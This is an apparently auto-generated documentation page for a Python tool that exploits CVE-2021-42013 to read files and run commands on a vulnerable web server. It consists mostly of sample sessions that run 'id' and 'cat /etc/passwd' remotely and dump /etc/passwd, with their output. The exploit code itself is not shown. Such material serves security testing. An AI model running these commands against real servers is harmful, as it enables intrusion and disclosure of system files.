Python: module CVE202142013

CVE202142013 (version 1.0.0)

index
cve202142013.py

This script exploits CVE-2021-42013 to print file or/and execute command. ~# python3 CVE202142013.py 127.0.0.1:80 CVE-2021-42013 Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [-] Target is not vulnerable. ~# python3 CVE202142013.py 172.17.0.2 CVE-2021-42013 Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [+] Target is vulnerable. ~# python3 CVE202142013.py -c "id" "echo H4CK" -c "cat /etc/passwd" -u "/" 172.17.0.2 CVE-2021-42013 Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [+] Target is vulnerable. uid=33(www-data) gid=33(www-data) groups=33(www-data) H4CK root:x:0:0:root:/root:/bin/bash www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ~# python3 CVE202142013.py -f "/etc/passwd" -o out.txt 172.17.0.2 CVE-2021-42013 Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [+] Target is vulnerable. ~# cat out.txt root:x:0:0:root:/root:/bin/bash www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ~# python3 CVE202142013.py -u "error" -f "/do/not/exists" 172.17.0.2 CVE-2021-42013 Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [+] Target is vulnerable. [-] Exploit is not working (HTTP error 403). ~# python3 CVE202142013.py -f "/do/not/exists" 172.17.0.2 CVE-2021-42013 Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [+] Target is vulnerable. [-] Exploit is not working (HTTP error 404). ~#

Data

__all__ = []
__author_email__ = 'mauricelambert434@gmail.com'
__copyright__ = '\nCVE-2021-42013 Copyright (C) 2022 Maurice Lam...ome to redistribute it\nunder certain conditions.\n'
__description__ = '\nThis script exploits CVE-2021-42013 to print file or/and execute command.\n'
__license__ = 'GPL-3.0 License'
__maintainer__ = 'Maurice Lambert'
__maintainer_email__ = 'mauricelambert434@gmail.com'
__url__ = 'https://github.com/mauricelambert/CVE-2021-42013'

Author

Maurice Lambert

Data
		__all__ = [] __author_email__ = 'mauricelambert434@gmail.com' __copyright__ = '\nCVE-2021-42013 Copyright (C) 2022 Maurice Lam...ome to redistribute it\nunder certain conditions.\n' __description__ = '\nThis script exploits CVE-2021-42013 to print file or/and execute command.\n' __license__ = 'GPL-3.0 License' __maintainer__ = 'Maurice Lambert' __maintainer_email__ = 'mauricelambert434@gmail.com' __url__ = 'https://github.com/mauricelambert/CVE-2021-42013'